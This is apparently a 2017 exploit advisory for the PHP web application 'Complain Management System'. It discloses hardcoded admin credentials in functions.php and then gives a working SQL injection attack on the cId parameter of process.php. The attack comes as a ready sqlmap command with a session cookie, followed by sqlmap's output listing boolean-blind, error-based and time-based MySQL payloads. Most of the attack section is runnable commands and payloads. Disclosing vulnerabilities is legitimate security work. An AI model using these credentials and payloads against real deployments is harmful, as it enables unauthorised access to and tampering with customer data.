# Title : Complain Management System SQL Injection# Date: 20 January 2017# Exploit Author: Sibusiso Sishi sibusiso@ironsky.co.za# Tested on: Windows7 x32# Vendor: https://sourceforge.net/projects/complain-management-system/# Version: not supplied# Download Software: https://sourceforge.net/projects/complain-management-system/files################################################### About The Product : ##
Complain Management is a Web based project used to manage Customer's complain Online. User can login,and Create complain, view complain details and track the status of its complain.## Vulnerability : ##
The functions.php file line 88 has hardcoded admin credentials.
elseif($uType =='admin'){//$_SESSION['user_id']= $row['sid'];if($userName =='admin'&& $password =='admin123'){
$_SESSION['user_id']=0;
$_SESSION['user_name']='Administrator';
$_SESSION['user_type']='admin';
header('Location: '.WEB_ROOT.'index.php');
exit;
Using the hardcoded admin credentials we then have access to the process.php file that is vulnerable to SQL injection.-HTTP Method : GET
- Sqlmap command: sqlmap -u "http://192.168.19.135/cms/process.php?action=deleteCust&cId=123"--cookie="PHPSESSID=q446r5fqav1qlljb7cohd29r85"- Sqlmap Output :
sqlmap identified the following injection point(s)with a total of 622 HTTP(s) requests:---
Parameter: cId (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: action=deleteCust&cId=123 RLIKE (SELECT (CASE WHEN (8336=8336) THEN 123 ELSE 0x28 END))
Type: error-based
Title: MySQL >=5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: action=deleteCust&cId=123 AND EXTRACTVALUE(8194,CONCAT(0x5c,0x7171706a71,(SELECT (ELT(8194=8194,1))),0x716a6b6271))
Type: AND/OR time-based blind
Title: MySQL >=5.0.12 AND time-based blind (query SLEEP)
Payload: action=deleteCust&cId=123 AND (SELECT * FROM (SELECT(SLEEP(5)))fdmM)---[22:54:32][INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.6.24
back-end DBMS: MySQL >=5.1